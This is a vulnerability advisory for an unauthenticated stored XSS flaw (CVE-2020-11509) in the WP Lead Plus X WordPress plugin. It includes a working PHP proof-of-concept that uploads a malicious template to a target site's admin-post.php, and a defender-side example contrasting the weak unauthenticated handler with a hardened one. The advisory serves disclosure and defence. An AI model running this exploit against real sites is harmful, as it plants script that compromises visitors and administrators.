WP Lead Plus X < 0.99 - Unauthenticated Stored Cross-Site Scripting (XSS)



Description
One of the features available to users who have paid for a license key for WP Lead Plus X is the ability to create and use "template" pages, which can be imported as a starting point when creating new pages. Although this feature is not visible if the plugin does not have a license key, it was still possible for an unauthenticated user to import a template containing malicious JavaScript. This was due to an admin_post action, c37_wpl_import_template, being available to unprivileged visitors.
Proof of Concept
<?php
// Settings
if ($argc < 2) {
	fwrite(STDERR, "Usage: php poc.php <site URL>\n");
	exit(1);
}
$url = $argv[1]; // URL of the site
$urlbits = parse_url($url);
$wp_url = $urlbits['scheme'].'://'.$urlbits['host'].'/';

// Import a malicious page template (pocpage.tpl must exist next to this script)
$tplPath = realpath('pocpage.tpl');
if ($tplPath === false) {
	fwrite(STDERR, "pocpage.tpl not found\n");
	exit(1);
}
$ch = curl_init();
// admin-post.php dispatches to the admin_post_nopriv_* hook for logged-out requests
curl_setopt($ch, CURLOPT_URL, $wp_url . 'wp-admin/admin-post.php');
$cFile = curl_file_create($tplPath);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
	'action' => 'c37_wpl_import_template',
	'files_name[]' => $cFile,
]);
$output = curl_exec($ch);
echo $output;
curl_close($ch);
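The root cause described above is an admin_post handler reachable through the admin_post_nopriv_* hook with no capability or nonce check. The following is an added defender-side illustration, not the plugin's own code or the researcher's PoC: the weak registration pattern next to a hardened handler. The handler function names, the option name and the nonce action are assumptions for the example.

```php
<?php
// Added illustration (not WP Lead Plus X source): how an admin_post action becomes
// reachable by unauthenticated visitors, and how to gate it properly.

// Weak pattern: registering the handler on admin_post_nopriv_* means WordPress
// runs it for logged-out requests to wp-admin/admin-post.php?action=...
add_action( 'admin_post_nopriv_c37_wpl_import_template', 'c37_wpl_import_template_weak' );

function c37_wpl_import_template_weak() {
    // No capability check, no nonce, and the raw upload is stored verbatim,
    // so any <script> inside the template lands in the database.
    $tpl = file_get_contents( $_FILES['files_name']['tmp_name'][0] );
    update_option( 'c37_wpl_templates_example', $tpl ); // option name assumed
    wp_die( 'imported' );
}

// Hardened pattern: only the authenticated hook, an explicit capability check,
// a nonce bound to the import form, and an allow-list filter on the content.
add_action( 'admin_post_c37_wpl_import_template', 'c37_wpl_import_template_hardened' );

function c37_wpl_import_template_hardened() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges', '', array( 'response' => 403 ) );
    }
    // Nonce action name is assumed; the form that posts here must emit the same one.
    check_admin_referer( 'c37_wpl_import_template' );

    if ( empty( $_FILES['files_name']['tmp_name'][0] ) || ! is_uploaded_file( $_FILES['files_name']['tmp_name'][0] ) ) {
        wp_die( 'No template uploaded', '', array( 'response' => 400 ) );
    }
    $tpl = file_get_contents( $_FILES['files_name']['tmp_name'][0] );
    // wp_kses_post() strips <script> tags and on* event-handler attributes before storage.
    update_option( 'c37_wpl_templates_example', wp_kses_post( $tpl ) );
    wp_die( 'imported' );
}
```

Registering only the admin_post_* hook (never admin_post_nopriv_*) is what closes the unauthenticated path; the capability and nonce checks then protect against low-privilege users and CSRF, and the kses filter limits what a stored template can carry even if an import is abused.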

Affects Plugin

References

CVE 2020-11509
URL https://www.wordfence.com/blog/2020/04/critical-vulnerabilities-in-the-wp-lead-plus-x-wordpress-plugin/

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher Ramuel Gall (Wordfence)
Submitter Ramuel Gall
Views 533
Verified No
WPVDB ID 10168

Timeline

Publicly Published 2020-04-07 (about 2 months ago)
Added 2020-04-07 (about 2 months ago)
Last Updated 2020-04-08 (about 2 months ago)
